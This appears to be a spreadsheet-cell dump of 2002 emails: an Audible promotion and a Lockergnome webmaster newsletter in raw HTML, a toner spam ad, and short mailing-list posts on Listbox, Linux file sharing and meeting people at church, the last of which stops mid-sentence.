 border=3D"0"&gt;   &lt;table width=3D"600" border=3D"0" align=3D"center"&gt;   &lt;tr=
 &gt;     &lt;td
 colspan=3D"6"&gt;&lt;p&gt;&lt;strong style=3D"color : 06c;"&gt;Audible is the source for
 great audio entertainment and information. Now you can forget about those
 expensive and clumsy audiobooks on cassette and CD. Audible is digital so
 you can listen on any computer or AudibleReady&amp;#153; Pocket PC or MP3
 player. Listen on your commute or at the gym or anywhere you want to get
 away from it all.&lt;br&gt;     &lt;img src=3D"http://www.audible.com/clear.gif"
 width=3D"1" height=3D"10" alt=3D"" border=3D"0"&gt;&lt;/strong&gt;&lt;/p&gt;&lt;/td&gt;   &lt;/tr=
 &gt;   &lt;tr&gt;=20
    &lt;td colspan=3D"6" align=3D"center" bgcolor=3D"#cccccc"&gt;&lt;img
 src=3D"http://img.audible.com/emails/images/2002/free_otis/otis_over_2000=
 0_2.gif"
 width=3D"350" height=3D"20" alt=3D"" border=3D"0" vspace=3D"8"&gt;&lt;/td&gt;   &lt;/=
 tr&gt;   &lt;tr&gt;=20
    &lt;td colspan=3D"6"&gt;&lt;img src=3D"http://www.audible.com/clear.gif" width=3D=
 "10"
 height=3D"1" alt=3D"" border=3D"0"&gt;&lt;/td&gt;   &lt;/tr&gt;   &lt;tr valign=3D"top"&gt;   =
 =20
 &lt;td&gt;&lt;img
 src=3D"http://www.audible.com/audiblewords/content/bk/sans/000353/small_f=
 rame.gif"
 border=3D"0" alt=3D""&gt;&lt;/td&gt;     &lt;td&gt;&lt;img
 src=3D"http://www.audible.com/audiblewords/content/bk/rand/000188/small_f=
 rame.gif"
 border=3D"0" alt=3D""&gt;&lt;/td&gt;     &lt;td&gt;&lt;img
 src=3D"http://www.audible.com/audiblewords/content/bk/mill/000031/small_f=
 rame.gif"
 border=3D"0" alt=3D""&gt;&lt;/td&gt;     &lt;td&gt;&lt;img
 src=3D"http://www.audible.com/audiblewords/content/bk/bant/000081/small_f=
 rame.gif"
 border=3D"0" alt=3D""&gt;&lt;/td&gt;     &lt;td&gt;&lt;img
 src=3D"http://www.audible.com/audiblewords/content/bk/blak/000546/small_f=
 rame.gif"
 border=3D"0" alt=3D""&gt;&lt;/td&gt;     &lt;td rowspan=3D"3" align=3D"center"
 valign=3D"middle"&gt;&lt;img
 src=3D"http://img.audible.com/emails/images/2002/free_otis/otis_nyt_2.gif=
 "
 width=3D"207" height=3D"37" alt=3D"" border=3D"0"&gt;&lt;br&gt;     &lt;img
 src=3D"http://www.audible.com/clear.gif" width=3D"1" height=3D"15" alt=3D=
 ""
 border=3D"0"&gt;&lt;br&gt;     &lt;img
 src=3D"http://img.audible.com/emails/images/2002/free_otis/otis_rw_2.gif"
 width=3D"212" height=3D"45" alt=3D"" border=3D"0"&gt;&lt;br&gt;     &lt;img
 src=3D"http://www.audible.com/clear.gif" width=3D"1" height=3D"15" alt=3D=
 ""
 border=3D"0"&gt;&lt;br&gt;     &lt;img
 src=3D"http://img.audible.com/emails/images/2002/free_otis/otis_wsj_2.gif=
 "
 width=3D"213" height=3D"16" alt=3D"" border=3D"0"&gt;&lt;br&gt;     &lt;img
 src=3D"http://www.audible.com/clear.gif" width=3D"1" height=3D"15" alt=3D=
 ""
 border=3D"0"&gt;&lt;br&gt;     &lt;img
 src=3D"http://img.audible.com/emails/images/2002/free_otis/otis_fastco.gi=
 f"
 width=3D"201" height=3D"30" alt=3D"" border=3D"0"&gt;&lt;/td&gt;   &lt;/tr&gt;   &lt;tr&gt;   =
   &lt;td
 colspan=3D"5"&gt;&lt;img src=3D"http://www.audible.com/clear.gif" width=3D"10"
 height=3D"1" alt=3D"" border=3D"0"&gt;&lt;/td&gt;   &lt;/tr&gt;   &lt;tr valign=3D"top"&gt;   =
 =20
 &lt;td&gt;&lt;img
 src=3D"http://www.audible.com/audiblewords/content/bk/sans/000293/small_f=
 rame.gif"
 border=3D"0" alt=3D""&gt;&lt;/td&gt;     &lt;td&gt;&lt;img
 src=3D"http://www.audible.com/audiblewords/content/bk/rand/000203/small_f=
 rame.gif"
 border=3D"0" alt=3D""&gt;&lt;/td&gt;     &lt;td&gt;&lt;img
 src=3D"http://www.audible.com/audiblewords/content/bk/time/000266/small_f=
 rame.gif"
 border=3D"0" alt=3D""&gt;&lt;/td&gt;     &lt;td&gt;&lt;img
 src=3D"http://www.audible.com/audiblewords/content/bk/high/000089/small_f=
 rame.gif"
 border=3D"0" alt=3D""&gt;&lt;/td&gt;     &lt;td&gt;&lt;img
 src=3D"http://www.audible.com/audiblewords/content/bk/durk/000025/small_f=
 rame.gif"
 border=3D"0" alt=3D""&gt;&lt;/td&gt;   &lt;/tr&gt;   &lt;/table&gt;   &lt;img
 src=3D"http://www.audible.com/clear.gif" width=3D"1" height=3D"10" alt=3D=
 ""
 border=3D"0"&gt;&lt;/td&gt; &lt;/tr&gt; &lt;tr bgcolor=3D"#0066CC"&gt;   &lt;td colspan=3D"2"
 align=3D"center"&gt;&lt;img src=3D"http://www.audible.com/clear.gif" width=3D"1=
 "
 height=3D"10" alt=3D"" border=3D"0"&gt;&lt;br&gt;   &lt;img
 src=3D"http://img.audible.com/emails/images/2002/free_otis/otis_free_otis=
 _today.gif"
 width=3D"420" height=3D"23" alt=3D"" border=3D"0"&gt;&lt;img
 src=3D"http://www.audible.com/clear.gif" width=3D"40" height=3D"1" alt=3D=
 ""
 border=3D"0"&gt;&lt;a href=3D"http://r.vresp.com/?A/8855727516"&gt;&lt;img
 src=3D"http://img.audible.com/emails/images/2002/free_otis/otis_click_her=
 e.gif"
 width=3D"114" height=3D"36" alt=3D"" border=3D"0"&gt;&lt;/a&gt;&lt;br&gt;   &lt;img
 src=3D"http://www.audible.com/clear.gif" width=3D"1" height=3D"10" alt=3D=
 ""
 border=3D"0"&gt;&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt;   &lt;td colspan=3D"2" class=3D"notes"&gt;&lt;p
 class=3D"notes"&gt;&lt;b&gt;Note:&lt;/b&gt; Offer expires 8/31/02. While supplies last. =
 You
 may have received this in error if you currently have more than one activ=
 e
 Audible account. Audible reserves the right to cancel, change or
 substitute this offer at any time. Void where prohibited by law and
 subject to all federal, state and local laws and regulations. Some titles
 are not available in all countries.&lt;/p&gt;   &lt;p class=3D"notes"&gt;&amp;copy;
 Copyright 2002 Audible, Inc., All Rights Reserved.&lt;/p&gt;&lt;/td&gt; &lt;/tr&gt; &lt;/table=
 &gt;
 &lt;/body&gt; &lt;/html&gt;=20
 &lt;br&gt;
                      &lt;hr color=3De0e0e0&gt;
                      &lt;table border=3D0 cellpadding=3D5 cellspacing=3D0
 width=3D100%&gt;
                      &lt;tr&gt;
                            &lt;td&gt;&lt;font face=3D"arial,verdana" size=3D1&gt;You =
 are
 receiving this email because you requested to receive info and updates vi=
 a
 email.
 To unsubscribe, reply to this email with "unsubscribe" in the subject or
 simply click on the following link: &lt;a
 href=3D"http://unsubscribe.verticalresponse.com/u.html?545c301b6d/aa3b97b=
 cc2"&gt;Unsubscribe&lt;/a&gt;&lt;/td&gt;
                      &lt;/tr&gt;
                      &lt;/table&gt;
 &lt;img src=3Dhttp://i.verticalresponse.com/blank.gif?545c301b6d/aa3b97bcc2&gt;
 --__________MIMEboundary__________--
 .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</si>
  <si>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&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/webmaster/20020712.html"&gt;
       http://www.lockergnome.com/issues/webmaster/20020712.html
       &lt;/a&gt;
       To unsubscribe, please e-mail the following address:
       leave-lgweb-2534373J@sprocket.lockergnome.com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#14367A }
  a:link    { COLOR: #008000; TEXT-DECORATION: underline; font-weight: normal }
  a:visited { COLOR: #003E00; TEXT-DECORATION: underline; font-weight: normal }
  a:active  { COLOR: #000000; text-decoration: none }
  a:hover   { color: GRAY; TEXT-DECORATION: none }
  p.title   { BACKGROUND: #FF9700; BORDER-BOTTOM: #E08A00 4px solid; BORDER-LEFT: #FFB03F 4px solid; BORDER-RIGHT: #E08A00 4px solid; BORDER-TOP: #FFB03F 4px solid; COLOR: #4C2E00; FONT-FAMILY: Comic Sans MS, Trebuchet MS, Helvetica, Arial; FONT-SIZE: 14pt; FONT-WEIGHT: normal }
  p.sidebar { BACKGROUND: #FF9700; TEXT-ALIGN: center; BORDER-BOTTOM: #E08A00 3px solid; BORDER-LEFT: #FFB03F 3px solid; BORDER-RIGHT: #E08A00 3px solid; BORDER-TOP: #FFB03F 3px solid; COLOR: #4C2E00; FONT-FAMILY: Comic Sans MS, Trebuchet MS, Helvetica, Arial; FONT-SIZE: 10pt; FONT-WEIGHT: bold } 
  .url      { font-size: 8pt; font-family: Verdana, Tahoma, Arial }
 --&gt;
 &lt;/style&gt;
 &lt;title&gt;20020712 Sausage Sizzler - Lockergnome - Webmaster Weekly&lt;/title&gt;&lt;/head&gt;
 &lt;body   MARGINHEIGHT="0" TOPMARGIN="0" BOTTOMMARGIN="0" bgcolor="#FFFFFF"   style="BACKGROUND-POSITION: right top; BACKGROUND-REPEAT: no-repeat" MARGINWIDTH="0" LEFTMARGIN="0" rightmargin="0" text="#4C2E00" alink="#000000" link="#008000" vlink="#003E00"&gt;
 &lt;!-- background="http://images.lockergnome.com/images/bg.head.gray.gif" bgcolor="#C0C0C0" left width="610" background="http://images.lockergnome.com/images/back.top-r1.gif"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href="http://www.basictemplates.com/"&gt;&lt;img src="http://www.lockergnome.com/images/ads/bt468x60.gif" width="468" height="60" alt="Web Templates with CSS" border="0"&gt;&lt;/a&gt;
  &lt;br&gt;
  &lt;/center&gt;
  &lt;!-- TOP BANNER AD --&gt;
  &lt;/td&gt;&lt;/tr&gt;
   &lt;tr&gt;&lt;td valign="top" bgcolor="#FFFFFF"&gt;&lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;!-- WebREPORT --&gt;
 &lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;
 &amp;nbsp;07.12.2002 WebREPORT&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;CUT YOUR DESIGN COSTS AND TIME:&lt;/b&gt; Get access to 250+ Web Templates 
 with CSS at &lt;a href="http://www.basictemplates.com/"&gt;BasicTemplates.com&lt;/a&gt;. 
 Annual memberships are only $54.95. Individual templates are $5.00 each. 
 New templates added weekly. No link back is required, and web designers 
 are not charged higher fees to use them on their clients' sites. 
 &lt;a href="http://www.basictemplates.com/tour/IFPro/scripts/imageFolio.cgi"&gt;Browse the full gallery&lt;/a&gt;!   
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 Somehow, it never got mentioned that Lockergnome has a GnomeTome for all 
 you 
 &lt;a href="http://www.gnometomes.com/tome/001691.html"&gt;Dreamweaver users&lt;/a&gt; out there. Dennis Jarrett, a gnomie from the UK 
 with a prolific list of writing accomplishments, lent his brain to a list 
 of things everyone should know to make using Dreamweaver 4 (and newer) 
 easier to use. I 've never actually used version 4, having stuck with 3 
 until recently starting the review process of the StudioMX  suite, but 
 I've been  able to apply every tip I tried to some aspect of DreamweaverMX, 
 so I can only guess those of you using 4 will want to 
 &lt;a href="http://www.gnometomes.com/tome/001691.html"&gt;check 'em out too&lt;/a&gt;.
 &lt;p&gt;
 As I mentioned in yesterday's Digital Media newsletter, I recently 
 switched cell phones to the 
 &lt;a href="http://www.kyocera-wireless.com/kysmart/kysmart_series.htm"&gt;Kyocera QCP6035&lt;/a&gt;. 
 The unit is Palm powered, with a screen the size of an m105 and all the 
 functionality of Palm OS, in addition to having the latest bells and whistles 
 you'd want in a phone. Built in Web browsing, by way of MSN, is slightly 
 cumbersome compared to what I'm used to from my cable connection, but I can 
 already see the usefulness in carrying around portable access to things like 
 driving directions. 
 &lt;p&gt;
 Now that I've got a way to test the final results in real time, I've got a 
 more vested interest in making Lockergnome considerably more WAP compatible. 
 I'm still figuring out many of the phone's features, so that's still going to 
 be at least  a few weeks away. Without a doubt, I'll be sharing my experiences 
 in WAPing Lockergnome in an upcoming series of articles.
 &lt;p align="right"&gt;&lt;font style="font-size: 22pt" face="Jake Ludington, Chris Pirillo, Comic Sans MS" size="5"&gt;Jake Ludington&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/font&gt;
 &lt;!-- MAIL --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeMAIL&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;phpMyNewsletter&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://gregory.kokanosky.free.fr/phpmynewsletter/"&gt;http://gregory.kokanosky.free.fr/phpmynewsletter/&lt;/a&gt;&lt;p&gt;
 As a free solution for managing newsletters, for smaller lists, 
 this does most of what you need. Subscribers are stored in a 
 mySQL database, with the ability to send user confirmation 
 e-mails. Initially, the address must still be added manually to 
 the database, which isn't idea, but doing this generates a 
 confirmation e-mail with a link that users click on if they want 
 to be added. The software purges addresses with no response, 
 following an administrator defined waiting period. From the php 
 interface you can send either text or HTML formatted messages, 
 with a built-in preview to make sure your formatting is OK. 
 Documentation is somewhat sparse, so prior knowledge of php and 
 mySQL are useful in getting this installed.
 &lt;br&gt;&lt;br&gt;
 &lt;!-- TOOLS --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeTOOLS&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;table align="right" cellpadding="0" cellspacing="8" border="0" valign="top"&gt;&lt;tr&gt;&lt;td align="center"&gt;
 &lt;a target="_blank" href="http://www.basictemplates.com/"&gt;&lt;img src="http://www.lockergnome.com/images/ads/bt193x60.gif" width="193" height="60" alt="Web Templates with CSS" border="0"&gt;&lt;/a&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;b&gt;OpalisRobot v4.0 [60MB] NT/W2k/XP&lt;/b&gt;&lt;p&gt;
 &lt;a href="http://www.opalis.com"&gt;http://www.opalis.com&lt;/a&gt;&lt;p&gt;
 Think of this as something like "cron for Windows" only even more powerful. 
 OpalisRobot allows you to schedule almost any process on your server, 
 adding an additional layer of functionality, like the ability to program 
 telephony commands to complete administrative tasks. OpalisRobot 
 effectively processes e-mail commands, in addition to telephone DTMF tones, 
 making everything on your server administerable from remote locations, 
 even when you can't get remote control access of the machine. Programming 
 jobs is point-click simple, saving you time even when you schedule tasks 
 to save you time. If you operate in a Windows server environment, you're 
 adding extra hours to your day and costing your company additional dollars 
 by not having this software.
 &lt;!-- SERVER --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeSERVER&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;PNG Files Do Not Show Transparency in Internet Explorer (Q294714)&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://support.microsoft.com/default.aspx?scid=kb;en-us;Q294714"&gt;http://support.microsoft.com/default.aspx?scid=kb;en-us;Q294714&lt;/a&gt;&lt;p&gt;
 "If you browse to a Web page that contains an image that has a transparent 
 background in Portable Network Graphics (PNG) format, the image background 
 may appear to be gray rather than transparent."
 Fortunately, Microsoft explains a solution for this problem. Personally, I 
 haven't encountered this PNG display error, but for those of you 
 simplementing PNGs on your sites, you'll want to review the solution.
 &lt;!-- Middle Ad --&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;WEB TEMPLATES WITH CSS:&lt;/b&gt; Cut your design costs and time with an 
 annual membership from &lt;a href="http://www.basictemplates.com/"&gt;BasicTemplates.com&lt;/a&gt;. 
 For only $54.95 get access to 250+ Web Templates. 
 &lt;a href="http://www.basictemplates.com/"&gt;New templates added weekly&lt;/a&gt;.  
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 &lt;!-- USABILITY --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeUSABILITY&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://diveintomark.org/"&gt;http://diveintomark.org/&lt;/a&gt;&lt;p&gt;
 Not only is this information great for improving blog accessibility, it 
 happens to be equally relevant for *any* site. The 30 days are nearing 
 their end, which means you won't have to wait to find out what's next; 
 you can simply click to the next page. Mark Pilgrim, the site's creator, 
 sets the stage with 5 characters (all of which could easily represent 
 real people) and walks through their physical, mental, and technological 
 limitations. Following the character introductions, Mark walks through 
 an accessibility scenario each day and then relates the concept back 
 specific benefits for each character's limitations. Solutions are 
 presented with blogs in mind, but with very little extrapolation you'll 
 be able to make every site you design more user friendly.
 &lt;!-- BLOG --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeBLOG&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Backend.UserLand.Com&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://backend.userland.com/"&gt;http://backend.userland.com/&lt;/a&gt;&lt;p&gt;
 I've been using Radio from the moment I finally got around to creating 
 a blog. The software keeps things simple and automatically updates 
 itself when new things get added. Userland goes far beyond creating a 
 desktop interface for their blogging system though. They've fully 
 documented all the XML, XML-RPC, and SOAP tie-ins used to connect to 
 their network, which could easily be adapted to other content 
 management applications with some XML knowhow. Backend is the place to 
 look "under the hood" at Userland's XML inner workings, including 
 detailed documentation on making everything work. If you've got 
 modifications or improvements to the system, they have an open 
 discussion forum for trading ideas.
 &lt;p align="center"&gt;&lt;p align="center"&gt;&lt;a target="_blank" href="http://www.basictemplates.com/"&gt;&lt;img src="http://www.lockergnome.com/images/ads/bt234x60.gif" width="234" height="60" alt="Web Templates with CSS" border="0"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;!-- ADMINISTRIVIA --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table cellpadding="0" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="sidebar"&gt;
 &lt;table cellpadding="7" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 8pt" face="Verdana, Tahoma, Arial" size="1"&gt;
 &lt;a href="http://www.lockergnome.com/issues/webmasterweekly/20020712.html"&gt;http://www.lockergnome.com/issues/webmasterweekly/20020712.html&lt;/a&gt;&lt;br&gt;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 align="center"&gt;&lt;a target="_blank" href="http://www.basictemplates.com/"&gt;&lt;img src="http://www.lockergnome.com/images/ads/bt88x31.gif" width="88" height="31" alt="Web Templates with CSS" border="0"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;
 &amp;nbsp;&lt;a HREF="http://lockergnome.pricegrabber.com/"&gt;Low Price Search&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a HREF="http://www.gnomedex.com/"&gt;$99 Tech Conference&lt;/a&gt;&lt;br&gt;
 &lt;p&gt;
 &amp;nbsp;&lt;a href="http://store.lockergnome.com"&gt;The GnomeSTORE&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/recommend.html"&gt;Tell a Friend About Us!&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/submit.html"&gt;Suggest a Feature&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/advertise.html"&gt;Advertise With Us&lt;/a&gt;&lt;br&gt;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href="mailto:jake@lockergnome.com?subject=Webmaster Weekly"&gt;E-mail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 bgcolor="#B6EB8F"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="sidebar"&gt;CREDITS&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br&gt;
 &lt;font style="font-size: 8pt" face="Verdana, Tahoma, Arial" size="1"&gt;
 &amp;copy;2002, Sausage Software and Lockergnome LLC. All Rights Reserved. Nathan Allan, the Sausage Crew and Lockergnome Lunatics spin all the content. Please read our &lt;a href="http://www.lockergnome.com/terms.html"&gt;Terms of Service&lt;/a&gt;.
 &lt;!-- FUNNY COMMENT    --&gt;
 &lt;/font&gt;
 &lt;p&gt;&amp;nbsp;&lt;p&gt;&amp;nbsp;Search Past Issues:&lt;br&gt;
 &lt;img src="http://www.lockergnome.com/images/blank.gif"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&lt;p&gt;&amp;nbsp;&lt;p&gt;&lt;table cellpadding="0" cellspacing="0" border="0" width="100%" bgcolor="#FFEEDD"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&lt;table cellpadding="5" cellspacing="1" border="0"&gt;&lt;tr&gt;&lt;td title="Click These Links to find your DREAM JOB!"&gt;&lt;font style="font-size: 8pt; font-family: Verdana"&gt;
 &lt;center&gt;&lt;b&gt;GETTING PAID WHAT YOU ARE WORTH?&lt;/b&gt;&lt;p&gt; Change your career - or get a better one! Your &lt;a href="http://www.lockergnome.com/jobs.html"&gt;dream job&lt;/a&gt; could be a mouse click away. Visit our &lt;a href="http://www.lockergnome.com/jobs.html"&gt;job search&lt;/a&gt; page for a position with a future.&lt;p&gt; &lt;a href="http://www.lockergnome.com/jobs.html"&gt;Find a new career&lt;/a&gt; today!
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;center&gt;
 &lt;a href="http://www.gnomedex.com/" target="_blank"&gt;&lt;img alt="See You in August!" src="http://chris.pirillo.com/archives/Gnomedex_Banner_going.gif" width="120" height="60" border="0"&gt;&lt;/a&gt;
 &lt;/center&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The Analyst Primer
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8613660,159/
 Date: 2002-10-06T18:13:00+01:00
 But industry analysts say Four little words that can make your investors 
 squeamish, put you right in the middle of the hot spot in the market, or send 
 the retail buyers to the phones to either double or cancel their big order of 
 your game. But who are these analysts? Who anointed them the masters of the 
 future and trends? Are they real people?
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Toners and inkjet cartridges for less             DFI
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;div bgcolor=3D"#FFFFCC"&gt;
   &lt;p align=3D"center"&gt;&lt;img border=3D"0" src=3D"http://easternisps.com/Tone=
 rs2GoLogo.jpg" width=3D"349" height=3D"96"&gt;&lt;/p&gt;
 &lt;p align=3D"center"&gt;&lt;font size=3D"6" face=3D"Arial MT Black"&gt;&lt;i&gt;Tremendous=
  Savings&lt;/i&gt;
 on Toners,&amp;nbsp;&lt;/font&gt;&lt;/p&gt;
 &lt;p align=3D"center"&gt;&lt;font size=3D"6" face=3D"Arial MT Black"&gt;
 Inkjets, FAX, and Thermal Replenishables!!&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;a href=3D"http://cohara.net"&gt;Toners 2 Go &lt;/a&gt;is your secret
 weapon to lowering your cost for &lt;u&gt;High Quality, Low-Cost&lt;/u&gt; printer
 supplies!&amp;nbsp; We have been in the printer replenishables business since =
 1992,
 and pride ourselves on rapid response and outstanding customer service.&amp;nb=
 sp;
 What we sell are 100% compatible replacements for Epson, Canon, Hewlett Pa=
 ckard,
 Xerox, Okidata, Brother, and Lexmark; products that meet and often exceed
 original manufacturer's specifications.&lt;/p&gt;
 &lt;p&gt;&lt;i&gt;&lt;font size=3D"4"&gt;Check out these prices!&lt;/font&gt;&lt;/i&gt;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Epson Stylus Color inkjet cartrid=
 ge
 (SO20108):&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Epson's Price: $27.99&amp;nbsp; &lt;font face=3D=
 "Arial MT Black"&gt;&amp;nbsp;&amp;nbsp;
 Toners2Go price: $9.95!&lt;/font&gt;&lt;/p&gt;
   &lt;p&gt;&amp;nbsp;&amp;nbsp; &lt;font face=3D"Arial MT Black"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/font&gt;=
 HP
 LaserJet 4 Toner Cartridge
 (92298A):&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp=
 ; HP's
 Price: $88.99&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;=
 nbsp; &lt;font face=3D"Arial MT Black"&gt;Toners2Go
   price: $41.75!&lt;/font&gt;&lt;/p&gt;
 &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;Come visit us on the web to check out our hundreds of similar bargains =
 at &lt;a href=3D"http://cohara.net"&gt;Toners
 2 Go&lt;/a&gt;!
 &lt;/p&gt;
 &lt;hr&gt;
 &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align=3D"center"&gt;&lt;i&gt;&lt;a href=3D"http://cohara.net/index17.htm"&gt;To
 unsubscribe from this list, click here.&lt;/a&gt;&lt;/i&gt;&lt;/p&gt;
 &lt;/div&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">At 11:06 AM 9/18/02 -0400, R. A. Hettinga wrote:
 &gt;Dave Farber's Interesting People list just went over to
 &gt;&lt;http://www.listbox.com&gt;
 It always was, I think. Meng Weng Wong, the founder of pobox, listbox et al 
 was a student of Dave Farber's.
 Listbox just upgraded its software, however.
 Udhay
 -- 
 ((Udhay Shankar N)) ((udhay @ pobox.com)) ((www.digeratus.com))
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Blatantly stolen from a friend's LJ
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Fork,
   http://www.pimprig.com/sections.php?op=viewarticle&amp;artid=72&amp;page=2
   This kid has -way- WAY too much time on his hands.
 -- 
 Best regards,
  bitbitch                          mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Aug 13, 2002 at 12:22:14PM +0100, Niall O Broin wrote:
 &gt; What are the best options available on Linux ? SFTP ? WebDAV ? Something
 &gt; else ? Linux servers - Linux and Mac OS-X clients.
 http://www.fs.net/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</si>
  <si>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-----BEGIN PGP SIGNED MESSAGE-----
 Hash: SHA1
 I know it's not the popular choice for a lot of people, but I'd
 suggest, um, church. :-). Like Woody Allen said, 90% of life is
 showing up, right?
 Almost anyone can find a church where the sermons don't make you bust
 out laughing, and you're set. I, for instance, am a Unitarian, which,
 as someone once observed, is merely a decompression chamber between a
 real church and a golf course. (ObUUJokes: Mid 70's bumper-sticker:
 "Honk if you're not sure"; Lenny Bruce: "Did you hear about how the
 Klan burned a question mark on the Unitarian's lawn?"; "Unitarians
 would rather go to a discussion group about heaven than to heaven
 itself."; "Unitarians pray 'to whom it may concern'"; etc...)
 But, seriously, folks, my teenage-adopted denomination (I'm, um,
 lapsed, on several fronts, a Dutch-Reformed-turned-atheist father and
 an agnostic mother who used to be a southern Baptist of some stripe
 or another) and frankly limousine liberal secular-humanist
 congregation is about as orthogonal to my present
 congenital-Republican small-l libertarian turned anarchocapitalist
 politics as it is possible to be (except for the secular-humanist
 bit...), and I still go pretty regularly, though not as much as I
 used to. Heck, the older I get the less of the divine I believe in.
 I'm asymptotically approaching my father's atheism, these days, and I
 show up at least once a month. Nice folks though, when I can keep a
 civil tongue in my head -- smart too, when I can't and end up arguing
 with them. :-).
 Anyway, if *I* can end up hitched, anyone can. Talk about orthogonal.
 I met my practically-socialist state-education-bureaucrat wife one
 year after I started, moved in with her 6 weeks later :-), married
 her 2 years after that, and I wasn't even trying meet women. I was
 just looking to make friends as I was new in town.
 The trick to the church thing is, whatever denomination/congregation
 you end up in, expect to end up with a mate, not a date. I mean, some
 guys manage to stay single, but most, like me, don't. You can
 practically see the laser-sights light up when you walk into a
